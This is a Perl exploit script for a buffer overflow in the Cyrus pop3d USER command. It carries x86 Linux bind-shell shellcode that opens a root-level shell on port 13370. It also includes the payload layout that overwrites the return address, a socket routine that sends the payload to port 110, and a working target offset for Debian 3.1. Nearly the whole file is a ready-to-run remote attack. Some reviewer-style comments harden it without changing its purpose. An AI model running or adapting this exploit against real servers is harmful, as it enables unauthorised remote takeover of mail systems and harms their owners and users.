#!/usr/bin/perl
## Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)
## Name: bid-18056.pl
## Date: 08/12/2006
##
## Description: this is yet another exploit for the Cyrus pop3d buffer overflow. I tried both public
## exploits and neither of them worked (not that they don't work, but coding my own is generally faster
## and easier), so I coded my own. The exploit by kcope seems to be done right and maybe I just got really
## unlucky and missed the offset in the 5 runs I gave it. The one from bannedit was interesting...
## really nice idea about overwriting the pointer and sticking your shellcode in the GOT. The only problem is that
## when I was writing this exploit with the same method, and placed my shellcode in the GOT, functions called before
## the return from the vulnerable function were segfaulting first by trying to actually *use* the GOT! So what I have
## done here is use the same method, but pick a data area that is not going to make pop3d
## crash before it gets to the return. Specifically I use part of the .data segment (or was it .bss, anyway) labeled
## 'buf'. With this the same one-offset-per-machine is gained that bannedit was achieving.
##
## Other: Basically what all this means is that you just have to give an offset that is a location in memory that
## is writable AND executable (anything in .data, .bss, the stack, the heap, etc.) and make sure it's not something
## that will need to be used by functions in pop3d before popd_canon_user() returns and hence executes your
## shellcode (because it'll segfault and won't get executed). Note that this only holds while the target maps
## that region executable; with NX / W^X enforced on the data mappings there is no such region and this
## technique will not work.
##
## Note: bindport is 13370
#################################################################################################################
use IO::Socket;
use strict;
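## --- main ---------------------------------------------------------------------
## Usage: perl bid-18056.pl $host $offset
##   $host   - target running the vulnerable Cyrus pop3d (TCP port 110)
##   $offset - 32-bit address (hex, e.g. 0x8106c20) of a region that is writable
##             AND executable and that pop3d will not touch before
##             popd_canon_user() returns (see the header comment)
my ($host, $offset) = @ARGV;
help() unless defined $host && length $host && defined $offset && length $offset;

## hex() returns 0 for junk (only warning under -w, which this script does not
## enable), which would silently send 480 NUL bytes as the "address" instead of
## the requested one; insist on a well-formed 32-bit hex value up front.
$offset =~ /\A(?:0[xX])?[0-9a-fA-F]{1,8}\z/
    or die("-!> offset must be a 32-bit hex address such as 0x8106c20, got '$offset'\n");

my $port = 110;

## x86 Linux bind shell: execs /bin//sh on TCP port 13370 (0x343a, see the
## "\x34\x3a" below). Stolen from cyruspop3d.c because this actually worked;
## I couldn't get any metasploit shellcode to work (as usual, hmph).
my $shellcode =
    "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96".
    "\x43\x52\x66\x68\x34\x3a\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56".
    "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1".
    "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0".
    "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53".
    "\x89\xe1\xcd\x80";

## Payload layout on the wire:
##   "USER "         - begin the USER command; everything after it is *userbuf / *user
##   $shellcode      - the bytes that end up copied to the chosen address and executed
##   address x 120   - overwrites the saved EIP and the *out pointer, so userbuf/user
##                     (i.e. the shellcode) is written to *out and the return lands in it
##   "\n"            - terminate the line
## 'V' packs an explicit little-endian 32-bit value: the target is x86, so the
## address bytes must be little-endian regardless of the host running this
## script ('l' would have used host byte order and broken on big-endian hosts).
my $address = pack('V', hex($offset));
my $payload = "USER " . $shellcode . ($address x 120) . "\n";

my $sock = IO::Socket::INET->new(
    PeerAddr => $host,
    PeerPort => $port,
    Proto    => 'tcp',
) or die("-!> unable to connect to '$host:$port': $!\n");
$sock->autoflush();

## NOTE(review): the server's greeting line is never read; the payload is written
## immediately after connect, exactly as the original did. Unlike the original,
## a failed write is reported instead of being ignored.
print {$sock} $payload
    or die("-!> write to '$host:$port' failed: $!\n");
close($sock);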
## Print the usage banner (including the one known offset) to STDOUT and exit
## with status 0. Called from the top of the script when either command-line
## argument is missing. $0 is the name this script was invoked as.
sub help {
    my @usage = (
        "bid-18056.pl by K-sPecial (xzziroz.net) of .aware (awarenetwork.org)",
        "08/12/2006",
        "",
        "perl $0 \$host \$offset",
        "",
        "Offsets: ",
        "0x8106c20 (debian 3.1 - 2.6.16-rc6)",
    );
    print map { "$_\n" } @usage;
    exit(0);
}